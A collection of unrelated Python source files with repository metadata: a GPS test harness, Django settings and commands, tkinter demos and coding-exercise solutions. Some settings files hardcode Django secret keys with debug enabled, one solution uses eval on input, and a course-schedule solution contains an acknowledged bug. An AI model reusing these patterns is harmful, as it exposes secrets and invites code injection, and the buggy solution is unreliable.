elif switch == '-T':
sys.stdout.write("sys %s platform %s: WRITE_PAD = %.5f\n" % (sys.platform, platform.platform(), gpsfake.WRITE_PAD))
raise SystemExit, 0
elif switch == '-u':
udp = True
elif switch == '-v':
verbose += 1
elif switch == '-M':
management = True
managementport = int(val)
elif switch == '-f':
withoutfile = True
elif switch == '-h':
sys.stderr.write("usage: gpsfake [-h] [-l] [-m monitor] [--D debug] [-o options] [-p] [-s speed] [-S] [-c cycle] [-b] logfile\n")
raise SystemExit, 0
print "File: " + str(withoutfile)
try:
pty.openpty()
except (AttributeError, OSError):
print >>sys.stderr, "gpsfake: ptys not available, falling back to UDP."
udp = True
if not arguments:
print >>sys.stderr, "gpsfake: requires at least one logfile argument."
raise SystemExit, 1
if progress and arguments:
baton = Baton("Processing %s" % ",".join(arguments), "done")
else:
print >>sys.stderr, "Processing %s" % ",".join(arguments)
# Don't allocate a private port when cycling logs for client testing.
if port is None and not pipe:
port = gps.GPSD_PORT
if management and managementport is None:
managementport = randint(20000,65000)
print "Management port: " + str(managementport)
queue = Queue.Queue()
tmppath = "workdir"
# Ensure the file is read/write by the creator only
saved_umask = os.umask(0077)
mythread = TCPThread(queue, managementport)
mythread.start()
print "Argument: " + str(arguments)
test = gpsfake.TestSession(prefix=monitor, port=port, options=doptions,
tcp=tcp, udp=udp, verbose=verbose,
predump=predump, slow=slow, queue=queue)
if pipe:
test.reporter = sys.stdout.write
if verbose:
progress = False
test.progress = sys.stdout.write
test.spawn()
try:
for logfile in arguments:
try:
sys.stderr.write(logfile+"\n")
test.gps_add(logfile, speed=speed, pred=fakehook, oneshot=singleshot)
except gpsfake.TestLoadError, e:
sys.stderr.write("gpsfake: " + e.msg + "\n")
raise SystemExit, 1
except gpsfake.PacketError, e:
sys.stderr.write("gpsfake: " + e.msg + "\n")
raise SystemExit, 1
except gpsfake.DaemonError, e:
sys.stderr.write("gpsfake: " + e.msg + "\n")
raise SystemExit, 1
except IOError, e:
if e.filename is None:
sys.stderr.write("gpsfake: unknown internal I/O error %s\n" % e)
else:
sys.stderr.write("gpsfake: no such file as %s or file unreadable\n" % e.filename)
raise SystemExit, 1
except OSError:
sys.stderr.write("gpsfake: can't open pty.\n")
raise SystemExit, 1
try:
if pipe:
test.client_add(client_init + "\n")
# Give daemon time to get ready for the feeds.
# Without a delay here there's a window for test
# sentences to arrive before the watch takes effect.
# This needs to increase if leading sentences in
# test loads aren't being processed.
time.sleep(1)
test.run(withoutfile)
except socket.error, msg:
sys.stderr.write("gpsfake: socket error %s.\n" % msg)
raise SystemExit, 1
except gps.client.json_error, e:
sys.stderr.write("gpsfake: JSON error on line %s is %s.\n" % (repr(e.data), e.explanation))
raise SystemExit, 1
except KeyboardInterrupt:
sys.stderr.write("gpsfake: aborted\n")
raise SystemExit, 1
finally:
mythread.running = False
test.cleanup()
print 'Close program, running: %r' % mythread.running
if progress:
baton.end()
# The following sets edit modes for GNU EMACS
# Local Variables:
# mode:python
# End:
|
[
"szzsolt92@gmail.com"
] |
szzsolt92@gmail.com
|
|
eb99ab34329327f2c45dd146512bf18c8ef09082
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/gJSkZgCahFmCmQj3C_2.py
|
d50a20751f09661bda0e9611af705c1da6d62a7d
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
Create a function that returns the original value from a list with too many
sub-lists.
### Examples
de_nest([[[[[[[[[[[[3]]]]]]]]]]]]) ➞ 3
de_nest([[[[[[[True]]]]]]]) ➞ True
de_nest([[[[[[[[[[[[[[[[["edabit"]]]]]]]]]]]]]]]]]) ➞ "edabit"
### Notes
You only need to retrieve one element.
"""
def de_nest(lst):
return eval(str(lst).replace('[', '').replace(']', ''))
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
37bf44a0f609cf6170a04deb132a1470a01c9574
|
c9775b4f74dab0c5e51ba56a6a75fc10520f2300
|
/ecomm/ecomm/settings.py
|
bc3dff88af5554f67c4d4e41f6fa8e6d8b762b0c
|
[
"MIT"
] |
permissive
|
aruntnp/MYPROJECTS
|
b8f9bf9782e66bb592ac271b5bd96f6bcbcebc32
|
a1aac3650db607c1a86c0d640a947588656f4f70
|
refs/heads/master
| 2020-04-07T07:11:57.905300
| 2018-12-17T06:00:34
| 2018-12-17T06:00:34
| 158,167,501
| 0
| 0
|
MIT
| 2018-12-17T06:00:36
| 2018-11-19T05:38:03
|
CSS
|
UTF-8
|
Python
| false
| false
| 4,696
|
py
|
"""
Django settings for ecomm project.
Generated by 'django-admin startproject' using Django 1.11.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
from easy_thumbnails.conf import Settings as thumbnail_settings
# ---------------- END ---------------
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_DIR = os.path.join(BASE_DIR, 'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'el)*wms615ps69v(6x7)sixp#+qp%q-e_o02ywtufblp^7gip4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['localhost', '127.0.0.1', '*']
#
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# 3rd PARTY
'widget_tweaks',
'imagekit',
'mathfilters',
# 'fluent_dashboard',
# 'easy_thumbnails',
# 'image_cropping',
# 'suit',
# MY_APPS
'addresses',
# 'addressus',
'products',
'carts',
'accounts',
'orders',
'billing',
# MYFILE
]
AUTH_USER_MODEL = 'accounts.User'
THUMBNAIL_PROCESSORS = (
'image_cropping.thumbnail_processors.crop_corners',
) + thumbnail_settings.THUMBNAIL_PROCESSORS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
TEMPLATE_CONTEXT_PROCESSORS = (
"django.core.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.request",
)
ROOT_URLCONF = 'ecomm.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR, ],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
# # This is added by me:
# 'libraries': {
# 'cache_bust': 'accounts.templatetags.form_tags',
#
# }
# End me...
},
},
]
WSGI_APPLICATION = 'ecomm.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static-c/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static_my_proj"),
]
MEDIA_URL = '/media/'
STATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_cdn", "static_root")
MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_cdn", "media_root")
# ---------------------- REDIRECTION ----------------------------------
# LOGOUT_REDIRECT_URL = 'prod:ProductListView'
LOGOUT_REDIRECT_URL = 'home'
# LOGIN_REDIRECT_URL = 'home'
LOGIN_URL = 'login'
|
[
"aruntnp@gmail.com"
] |
aruntnp@gmail.com
|
986630c6696395614a2c1ce940ed8fdfb5a83198
|
bf97a169e18a256294018c0a81837e59680859d8
|
/ZigZagTree.py
|
cf567f46afb5cfd9fed941be2ccaa849f71cbb64
|
[] |
no_license
|
oskip/IB_Algorithms
|
780904842372a608362528758377344e126d3012
|
094d871ac4b808d883d5af5430bac47782132c6b
|
refs/heads/master
| 2021-01-19T04:25:13.948498
| 2016-07-04T16:55:09
| 2016-07-04T16:55:09
| 50,581,848
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,396
|
py
|
# Given a binary tree, return the zigzag level order traversal of its nodes' values.
# (ie, from left to right, then right to left for the next level and alternate between).
#
# Example :
# Given binary tree
#
# 3
# / \
# 9 20
# / \
# 15 7
# return
#
# [
# [3],
# [20, 9],
# [15, 7]
# ]
# Definition for a binary tree node
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
# @param A : root node of tree
# @return a list of list of integers
def zigzagLevelOrder(self, root):
res = [[root]]
wasAny = True
while wasAny:
lastRow = res[-1]
currRow = []
wasAny = False
for i in reversed(range(0,len(lastRow))):
if lastRow[i].right or lastRow[i].left: wasAny = True
if len(res) % 2 == 1: #rl
if lastRow[i].right: currRow.append(lastRow[i].right)
if lastRow[i].left: currRow.append(lastRow[i].left)
else: #lr
if lastRow[i].left: currRow.append(lastRow[i].left)
if lastRow[i].right: currRow.append(lastRow[i].right)
if(wasAny): res.append(currRow)
for i, arr in enumerate(res):
res[i] = [n.val for n in arr]
return res
|
[
"oskipet@gmail.com"
] |
oskipet@gmail.com
|
5c3f9983e5425cda9d43278a436f6c1a7fc30d7e
|
81af4f5509ead2e3aecdcfef39d17f0a5da8502b
|
/simp-py-code/DL_9.8_PackManagerDemo.py
|
8536fe19460c9754f8f8132bc25fd957a29e38a6
|
[
"MIT"
] |
permissive
|
Michaeloye/python-journey
|
db2d96a0af893bc6b992c404d56b9be2341d8e74
|
ff8ce0e8796a129994f9a9a9dbb80340fa5790dc
|
refs/heads/main
| 2023-03-22T20:53:01.957824
| 2021-02-28T21:26:06
| 2021-02-28T21:26:06
| 342,891,353
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,419
|
py
|
from tkinter import *
class Pack_Manager_Demo_1:
def __init__(self):
window = Tk()
label_1 = Label(window, text = "blue", bg = "blue")
label_2 = Label(window, text = "red", bg = "red")
label_3 = Label(window, text = "green", bg = "green")
label_1.pack()
label_2.pack(fill = BOTH, expand = 1) # fill option is used in pack manager to assign where the entity will occupy it can be X, Y, or BOTH... expand option is used to in the pack manager to assign additional space to the widget box
label_3.pack(fill = BOTH)
window.mainloop()
Pack_Manager_Demo_1()
class Pack_Manager_Demo_2:
def __init__(self):
window = Tk()
self.label_1 = Label(window, text = "blue", bg = "blue")
self.label_2 = Label(window, text = "red", bg = "red")
self.label_3 = Label(window, text = "green", bg = "green")
self.label_1.pack(side = LEFT) # side option is used in the pack manager to assign where the widgets will be
self.label_2.pack(side = LEFT, fill = BOTH, expand = 1) # fill option is used in pack manager to assign where the entity will occupy it can be X, Y, or BOTH... expand option is used to in the pack manager to assign additional space to the widget box
self.label_3.pack(side = LEFT, fill = BOTH)
window.mainloop()
Pack_Manager_Demo_2()
|
[
"michealoye23@gmail.com"
] |
michealoye23@gmail.com
|
8f22ecc592588d5625846e343c4a6c77f30ddf4c
|
da8fd5c74dd23304b668b1e7b7ace549bc6db1ac
|
/bestoon/settings.py
|
fea5ee1075c11024cd00d53d6929ef29731b82d3
|
[] |
no_license
|
bahrambeigy/bestoon
|
8710e1e1c070413a23e62f276eafcf3297fa1004
|
b432508b78e99b3a9fbf16abc5a3d7f7b225954a
|
refs/heads/master
| 2021-01-19T13:17:48.318275
| 2017-02-18T12:52:23
| 2017-02-18T12:52:23
| 82,372,928
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,110
|
py
|
"""
Django settings for bestoon project.
Generated by 'django-admin startproject' using Django 1.10.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'u-!s%*mms#z$spoe76n%koe-378$8l*f!%2o^oe+c5mq_n4918'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'web',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'bestoon.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'bestoon.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
|
[
"bahramwhh@gmail.com"
] |
bahramwhh@gmail.com
|
727a0764849d0aa40033231339d636203c29c310
|
6ba96a57691e53f8694fe080870475d447790bf7
|
/moviesHaven/management/commands/removesymlink.py
|
eb6305ac6098a146898ae8210fbab67a25a40b8d
|
[] |
no_license
|
gahan9/mdb
|
194ae26778789e6137738190a598466a28e70165
|
71e3736bed7e3c55461df9fcd72cec5c933404fa
|
refs/heads/master
| 2020-04-01T11:26:02.725565
| 2018-04-26T05:28:15
| 2018-04-26T05:28:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,268
|
py
|
import os
from django.utils import timezone
from django.core.management.base import BaseCommand
from moviesHaven.models import StreamAuthLog
class Command(BaseCommand):
diff_hours = 4
help = 'Removes the streams older then {} hours'.format(diff_hours)
def add_arguments(self, parser):
parser.add_argument('hours', nargs='?', type=int, default=self.diff_hours)
def handle(self, *args, **options):
arg = options.get('hours', None)
if arg is not None:
self.diff_hours = arg
time_diff = timezone.now() - timezone.timedelta(hours=self.diff_hours)
stream_instances = StreamAuthLog.objects.filter(date_created__lt=time_diff)
for stream in stream_instances:
if stream.sym_link_path:
try:
if os.path.exists(stream.sym_link_path):
os.remove(stream.sym_link_path)
self.stdout.write(self.style.SUCCESS('Successfully removed stream: {}'.format(stream.sym_link_path)))
stream.delete()
except Exception as e:
print("STREAM DELETE FAILED: {} - {}\nreason: {}".format(stream.id, stream.sym_link_path, e))
else:
stream.delete()
|
[
"gahan@quixom.com"
] |
gahan@quixom.com
|
a38acdad156f72fdd2500aa31e6c6b49ea96e5cc
|
10201699ebe5d9e2f74dd523ea445a7287c05edd
|
/profile_project/urls.py
|
0b22c8208fbbf0e91cd2f1f46975a01a72f0dd17
|
[] |
no_license
|
ravil1234/profiles-rest-api
|
58d6e64e7b82fe01833eaa96e97d74d0ddee9559
|
ca9857b212dcabc334aa08e193a45923e4a87825
|
refs/heads/master
| 2022-12-16T12:37:35.806357
| 2020-09-04T10:57:28
| 2020-09-04T10:57:28
| 291,421,416
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 810
|
py
|
"""profile_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
urlpatterns = [
path('admin/', admin.site.urls),
path('api/',include('profile_api.urls'))
]
|
[
"mohdravil000@gmail.com"
] |
mohdravil000@gmail.com
|
86be494a958b73f46e7e93e42390b4e092814fad
|
011f01e013439a672637402b13c81ec3b24893d2
|
/canFinish.py
|
25935b54deefd7cc6c7089babf6a7cb6444f836c
|
[] |
no_license
|
AkshayGyara/BFS-1
|
3fe961abf1864717f5099f39e46bbceb7e331f9f
|
20c3c215172d444b0da7a0688c77708ee62ce8fd
|
refs/heads/master
| 2022-11-11T21:50:33.142332
| 2020-06-24T07:56:11
| 2020-06-24T07:56:11
| 274,525,594
| 0
| 0
| null | 2020-06-23T22:59:01
| 2020-06-23T22:59:00
| null |
UTF-8
|
Python
| false
| false
| 1,228
|
py
|
#207. Course Schedule
# Time Complexity : O(v*e)
# Space Complexity :O(v*e)
# Did this code successfully run on Leetcode : Yes
# Any problem you faced while coding this : Yes
# I am getting wrong output ie false instead of true for 1 test case ie 2 [[0,1]] . I am unable to figure out the error here.
from collections import deque, defaultdict
class Solution:
def canFinish(self, numCourses: int, prerequisites: List[List[int]]) -> bool:
if not numCourses:
return False
indegree = [0]*numCourses
dic = defaultdict(lambda : [])
for edges in prerequisites:
indegree[edges[0]] += 1
dic[edges[1]].append(edges[0])
queue = []
for i in range(len(indegree)):
if indegree[i] == 0:
queue.append(indegree[i])
while queue:
key = queue.pop(0)
curr = dic[key]
for i in range(len(curr)):
indegree[curr[i]] -= 1
if indegree[curr[i]] == 0:
queue.append(curr[i])
for i in range(len(indegree)):
if indegree[i] > 0:
return False
return True
|
[
"noreply@github.com"
] |
AkshayGyara.noreply@github.com
|
379064cb909876e595db016f6827ea4460162564
|
5ad0d71e4773661c18de3b1f5072db37e75d5a45
|
/utils/generator_exe1.py
|
fa177819dadad01a87728361f378b6307c78921c
|
[] |
no_license
|
rafaelvc/mestrado
|
c4d52eb0146900ea97522167a5de75a65abf6f2c
|
34b24ebbae386e6301cdb60bb8c1a6e28bec654a
|
refs/heads/master
| 2021-01-16T21:00:47.334364
| 2011-09-28T01:48:27
| 2011-09-28T01:48:27
| 2,471,637
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
def generator1(a):
pop = True
for z in a[:]:
if pop:
pop = False
r = a.pop()
else:
pop = True
r = a.pop(0)
yield r, a
|
[
"verganic@gmail.com"
] |
verganic@gmail.com
|
a59d49b8d2d252b971247f1badc1e112991bdf00
|
cb689204f5d078c9c598bf0810a8cbd012b24f20
|
/PyDDerPub.py
|
b5f328d7d8c123784bfb6bcd75605cb8a8a80777
|
[
"MIT"
] |
permissive
|
bdnguyen/DailyDrawer
|
06fdbff3199af30cc471b028ce2672ca0f81039d
|
c9055d5ea09f3dd97b28cc574bed94fe70413f64
|
refs/heads/master
| 2020-04-08T08:39:05.110825
| 2017-01-23T10:24:29
| 2017-01-23T10:24:29
| 34,993,143
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,072
|
py
|
#!/usr/bin/env python3
import sys, argparse
import requests
from bs4 import BeautifulSoup
parser = argparse.ArgumentParser()
parser.add_argument(
'email', metavar='STR', type=str, help='enter email')
parser.add_argument(
'password', metavar='STR', type=str, help='enter password')
args = parser.parse_args()
email = sys.argv[1]
password = sys.argv[2]
soldierID1 = 361075717
soldierID2 = 371523810
session = requests.Session()
URL = 'https://battlefield.play4free.com/en/user/login/'
r1 = session.get(URL)
soup = BeautifulSoup(r1.content)
csrftoken = soup.find(id="csrf_token")['value']
payload = {'mail' : email, 'password' : password, '_csrf_token' : csrftoken}
r2 = session.post(URL, data=payload)
if email=='your_email@some_mail.com':
r3 = session.get('https://battlefield.play4free.com/en/draw/drawCard?personaId='+soldierID1+'&card=0&_csrf_token='+csrftoken)
else: r3 = session.get('https://battlefield.play4free.com/en/draw/drawCard?personaId='+soldierID2+'&card=0&_csrf_token='+csrftoken)
print('Request response: ' + str(r3.status_code))
print(r3.text)
|
[
"binhduongng@gmail.com"
] |
binhduongng@gmail.com
|
4af65a91448180f526c96859c264e06b82df3b51
|
aa47bc1197aea44676cd3f189b36b4e6a1575fd7
|
/eshop_slider/admin.py
|
0b234c58bdc60f0cce8e2d6d776e4032f258b263
|
[] |
no_license
|
erfanmorsali/shop
|
03ab90ac60054754f34701a69138adb284db6a4c
|
17ca08378df283662cf5c5a71cd116176e388ec4
|
refs/heads/master
| 2023-04-27T21:39:02.776471
| 2021-05-20T07:01:59
| 2021-05-20T07:01:59
| 286,720,148
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 89
|
py
|
from django.contrib import admin
from .models import Slider
admin.site.register(Slider)
|
[
"erfanmorsali78@gmail.com"
] |
erfanmorsali78@gmail.com
|
12e8c7410faa6d00dbb211d6cb559d4ffcb70ecd
|
51651d7f17e80788e9e8030c35ae69339437eb4c
|
/thing/migrations/0021_auto_20170824_1953.py
|
f7f828489e8c96204219fb682bfbd97fe5e69a61
|
[
"BSD-2-Clause"
] |
permissive
|
skyride/evething-2
|
508c4300eb904e231d74861da3ee7a6384febe30
|
e0778a539b7f8a56667b2508293ca7e9f515283f
|
refs/heads/develop
| 2020-12-30T13:45:50.392322
| 2018-06-23T15:35:57
| 2018-06-23T15:35:57
| 91,246,619
| 21
| 10
|
BSD-2-Clause
| 2018-05-22T22:07:27
| 2017-05-14T13:53:09
|
Python
|
UTF-8
|
Python
| false
| false
| 693
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('thing', '0020_auto_20170707_0010'),
]
operations = [
migrations.AddField(
model_name='characterdetails',
name='jump_fatigue_expire_date',
field=models.DateTimeField(default=None, null=True),
preserve_default=True,
),
migrations.AddField(
model_name='characterdetails',
name='last_jump_date',
field=models.DateTimeField(default=None, null=True),
preserve_default=True,
),
]
|
[
"skylinerspeeder@gmail.com"
] |
skylinerspeeder@gmail.com
|
8a90e31922b050e237b026aa70cad9fd38a6277f
|
11aaa9f4fccab3f05deddb092fc87fd24f08d643
|
/music/migrations/0002_song_is_favourite.py
|
ea522cc3842d44cd1d4eb6a66538ec5db0a327ea
|
[] |
no_license
|
prorammerarc/Django-MediaPalyer
|
3282499c739670e74b742932ba133db086e97dcb
|
b97bedcd662ceff83eb645507cc04deb4956748f
|
refs/heads/master
| 2021-05-11T21:05:12.025427
| 2018-01-14T19:36:04
| 2018-01-14T19:36:04
| 117,460,494
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 378
|
py
|
# Generated by Django 2.0.1 on 2018-01-12 20:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('music', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='song',
name='is_favourite',
field=models.BooleanField(default=False),
),
]
|
[
"32127426+prorammerarc@users.noreply.github.com"
] |
32127426+prorammerarc@users.noreply.github.com
|
779c6db4958d4ad6d3df4f2936350c375c0adf64
|
cb92e6a682c6399eda74c90cb679737ee8752612
|
/OSINT_Platform/tests/test_models.py
|
0a999e4c2c498314dd7bb7ef57a66a9bcff2daf6
|
[
"BSD-3-Clause"
] |
permissive
|
Prontious/Dissertation
|
61a856be61d01b3d888ff45f436111d9e2d57b69
|
93d70079eaf401845420647c60145d6e709eb717
|
refs/heads/master
| 2020-03-23T15:18:12.075430
| 2018-07-20T16:56:29
| 2018-07-20T16:56:29
| 141,736,763
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,957
|
py
|
# -*- coding: utf-8 -*-
"""Model unit tests."""
import datetime as dt
import pytest
from OSINT_Platform.user.models import Role, User
from .factories import UserFactory
@pytest.mark.usefixtures('db')
class TestUser:
"""User tests."""
def test_get_by_id(self):
"""Get user by ID."""
user = User('foo', 'foo@bar.com')
user.save()
retrieved = User.get_by_id(user.id)
assert retrieved == user
def test_created_at_defaults_to_datetime(self):
"""Test creation date."""
user = User(username='foo', email='foo@bar.com')
user.save()
assert bool(user.created_at)
assert isinstance(user.created_at, dt.datetime)
def test_password_is_nullable(self):
"""Test null password."""
user = User(username='foo', email='foo@bar.com')
user.save()
assert user.password is None
def test_factory(self, db):
"""Test user factory."""
user = UserFactory(password='myprecious')
db.session.commit()
assert bool(user.username)
assert bool(user.email)
assert bool(user.created_at)
assert user.is_admin is False
assert user.active is True
assert user.check_password('myprecious')
def test_check_password(self):
"""Check password."""
user = User.create(username='foo', email='foo@bar.com',
password='foobarbaz123')
assert user.check_password('foobarbaz123') is True
assert user.check_password('barfoobaz') is False
def test_full_name(self):
"""User full name."""
user = UserFactory(first_name='Foo', last_name='Bar')
assert user.full_name == 'Foo Bar'
def test_roles(self):
"""Add a role to a user."""
role = Role(name='admin')
role.save()
user = UserFactory()
user.roles.append(role)
user.save()
assert role in user.roles
|
[
"john_digger@hotmail.co.uk"
] |
john_digger@hotmail.co.uk
|
4cb8cf2b1b442bee39531717172c2a50c13d240b
|
a5961e847399c0b1c9d68400bb5eb4d3d5bfe165
|
/settings.py
|
378bf3085929c7dda60dbe779806b1eac5059670
|
[] |
no_license
|
robbiethegeek/drupalcores
|
58a1b12fbbe8751c8f6d704d0be555aec5a25c84
|
cc6442040bb3e8d022303cc34b5b211d39e32fc4
|
refs/heads/master
| 2020-12-25T00:19:23.420697
| 2012-05-20T23:00:34
| 2012-05-20T23:00:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
GIT_COMMIT_COUNT = "git log 8.x --oneline --since=2011-03-09 | wc -l"
GIT_LOG = "git log 8.x --pretty=format:'%h : %s' --since='2011-03-09'"
|
[
"eric.duran7@gmail.com"
] |
eric.duran7@gmail.com
|
0705c7a9e3f80b1237a7a53809691d229add1bd2
|
f7638626d1141f12fd4b2e019aa60200aee4a0f2
|
/utils/video.py
|
1d0c12b79c6ac3c6bf36c39887adea709e856034
|
[] |
no_license
|
lanewarn/lanewarn-python-backend
|
dee079fa6fca5949d2aedfd645710c3920792e83
|
23a8a65ee960516e40c3e12a6a6dea65a4197755
|
refs/heads/master
| 2020-05-22T03:36:33.899948
| 2019-05-13T09:19:58
| 2019-05-13T09:19:58
| 186,215,555
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 48
|
py
|
def bgr_to_rgb(frame): return frame[:, :, ::-1]
|
[
"mail@fronbasal.de"
] |
mail@fronbasal.de
|
3f89c4833a31cad2369f99ecfcbccd9c6c382591
|
38258a7dd9acbfb7adf72983015de68a948a4826
|
/B_2000~/B_2839.py
|
8d8d1250988314bd2ea6b97cd2af25aea67f4df5
|
[] |
no_license
|
kangsm0903/Algorithm
|
13a7fe5729039a1d0ce91a574c4755a8a92fb02b
|
7d713d1c9e2e4dc30141d4f409ac1430a357065b
|
refs/heads/master
| 2022-10-04T00:33:49.247977
| 2022-09-26T12:51:16
| 2022-09-26T12:51:16
| 219,265,010
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 215
|
py
|
# 2020/01/05 2839번(설탕배달)
N = int(input())
M = []
for i in range(0,N):
for k in range(0,N):
if 5*k + 3*i == N:
M.append(k+i)
try:
print(min(M))
except ValueError:
print(-1)
|
[
"kangsm0903@naver.com"
] |
kangsm0903@naver.com
|
d68363e212719df3dd5ddd936bd78bc8ed051b7e
|
7fc3b56653be1fb3988b9f20191d4071d5e7ffd6
|
/controller/com/invalid.py
|
8d3f03b5a909a16e97a4e9e6dcc629ecbfb9ca4c
|
[] |
no_license
|
tripitakas/cbeta-reader
|
